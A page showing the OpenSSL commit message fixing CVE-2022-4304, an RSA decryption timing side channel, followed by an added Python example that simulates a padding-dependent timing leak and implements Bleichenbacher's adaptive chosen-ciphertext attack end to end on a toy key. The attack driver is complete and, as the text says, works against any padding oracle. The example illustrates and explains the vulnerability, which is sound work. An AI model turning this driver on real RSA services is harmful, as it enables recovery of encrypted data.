    Fix Timing Oracle in RSA decryption · a98b861d
    Committed by Dmitry Belyavskiy
    A timing based side channel exists in the OpenSSL RSA Decryption
    implementation which could be sufficient to recover a plaintext across
    a network in a Bleichenbacher style attack. To achieve a successful
    decryption an attacker would have to be able to send a very large number
    of trial messages for decryption. The vulnerability affects all RSA
    padding modes: PKCS#1 v1.5, RSA-OAEP and RSASVE.
    
    Patch written by Dmitry Belyavsky and Hubert Kario
    
    CVE-2022-4304
    Reviewed-by: Matt Caswell <matt@openssl.org>
    Reviewed-by: Tomas Mraz <tomas@openssl.org>
    Signed-off-by: code4lala <fengziteng2@huawei.com>
    Change-Id: Ib81f15484fa3374bf5f50baece50bb36d105d6d7
Changed file: bn_local.h (25.3 KB)
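The commit message says a timing difference in RSA decryption is enough for a Bleichenbacher-style attack that recovers a plaintext after a very large number of trial decryptions. The following is an added example written for this page; it is not code from this commit or from OpenSSL. It models the leak as a decryptor whose simulated cost depends on whether the decrypted block starts with the PKCS#1 v1.5 header bytes 00 02 (a constructed stand-in, not OpenSSL's actual leaking code path), turns that cost into a yes/no oracle, and drives Bleichenbacher's adaptive chosen-ciphertext algorithm with it. Assumptions: a toy 150-bit key built from two Mersenne primes so the run is deterministic and offline, a fixed non-random padding string, a noise-free measurement (a real attacker repeats each query to average out jitter, which is where the "very large number" of messages comes from), and the oracle only checks the leading two bytes. The names `timed_decrypt`, `timing_oracle`, `bleichenbacher` and `demo` are this example's own.

```python
"""Bleichenbacher-style plaintext recovery driven by a simulated timing oracle.
Added example for illustration; toy key and cost model, not OpenSSL code."""

# Toy key from two Mersenne primes (assumption: 150-bit modulus; real keys are >= 2048 bits).
P = (1 << 89) - 1
Q = (1 << 61) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8            # modulus length in bytes (19 here)

BASE_COST, EXTRA_COST = 1000, 40          # constructed "cycle counts" for the cost model


def timed_decrypt(c: int) -> int:
    """Vulnerable decryptor model: cost depends on whether the block has a 00 02 header.
    Constructed stand-in for a timing leak, not OpenSSL's code path."""
    em = pow(c, D, N).to_bytes(K, "big")
    cost = BASE_COST
    if em[0] == 0 and em[1] == 2:
        cost += EXTRA_COST                # extra work happens only for "valid" padding
    return cost


def timing_oracle(c: int) -> bool:
    """Attacker's view: one noise-free timing measurement, thresholded."""
    return timed_decrypt(c) > BASE_COST + EXTRA_COST // 2


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def merge(intervals):
    """Merge overlapping/adjacent [a, b] intervals."""
    intervals.sort()
    out = []
    for a, b in intervals:
        if out and a <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], b))
        else:
            out.append((a, b))
    return out


def bleichenbacher(n, e, c, k, oracle):
    """Recover m = c^d mod n using only oracle(x) == 'x^d mod n starts with 00 02'.
    Returns (m, number of oracle queries). Assumes c itself is conformant (no blinding)."""
    B = 1 << (8 * (k - 2))
    lo_b, hi_b = 2 * B, 3 * B - 1        # conformant blocks lie in [2B, 3B-1]
    queries = 0

    def conformant(s):
        nonlocal queries
        queries += 1
        return oracle((c * pow(s, e, n)) % n)

    if not oracle(c):
        raise ValueError("example assumes a conformant ciphertext")
    M = [(lo_b, hi_b)]
    s = ceil_div(n, 3 * B)
    first = True
    while True:
        if first:                         # step 2a: linear search from n/(3B)
            while not conformant(s):
                s += 1
            first = False
        elif len(M) > 1:                  # step 2b: several intervals remain
            s += 1
            while not conformant(s):
                s += 1
        else:                             # step 2c: one interval, roughly double s
            a, b = M[0]
            r = ceil_div(2 * (b * s - lo_b), n)
            while True:
                s_lo = ceil_div(lo_b + r * n, b)
                s_hi = (hi_b + r * n) // a
                hit = next((t for t in range(s_lo, s_hi + 1) if conformant(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1
        new = []                          # step 3: narrow every interval using s
        for a, b in M:
            for r in range(ceil_div(a * s - hi_b, n), (b * s - lo_b) // n + 1):
                na = max(a, ceil_div(lo_b + r * n, s))
                nb = min(b, (hi_b + r * n) // s)
                if na <= nb:
                    new.append((na, nb))
        M = merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries


def pkcs1_v15_encode(msg: bytes, k: int) -> int:
    """Type 2 block 00 02 || PS || 00 || msg with a fixed non-zero PS (constructed; real encoders use random bytes)."""
    ps_len = k - 3 - len(msg)
    assert ps_len >= 8, "message too long for this toy modulus"
    ps = bytes((i % 255) + 1 for i in range(ps_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def pkcs1_v15_decode(em_int: int, k: int) -> bytes:
    em = em_int.to_bytes(k, "big")
    assert em[:2] == b"\x00\x02"
    return em[em.index(b"\x00", 2) + 1:]


def demo(msg: bytes = b"secret!!"):
    """Encrypt msg, then recover it from the timing oracle alone."""
    c = pow(pkcs1_v15_encode(msg, K), E, N)   # the captured ciphertext
    m, queries = bleichenbacher(N, E, c, K, timing_oracle)
    return pkcs1_v15_decode(m, K), queries


if __name__ == "__main__":
    plaintext, queries = demo()
    print(plaintext, "recovered after", queries, "trial decryptions")
```

The attacker never sees a decryption error; every bit of information comes from the thresholded cost, which is why the fix has to make the work done after decryption independent of the decrypted value rather than merely suppress error messages. The same driver works unchanged against any oracle that distinguishes conformant from non-conformant blocks, whichever padding mode produced the difference.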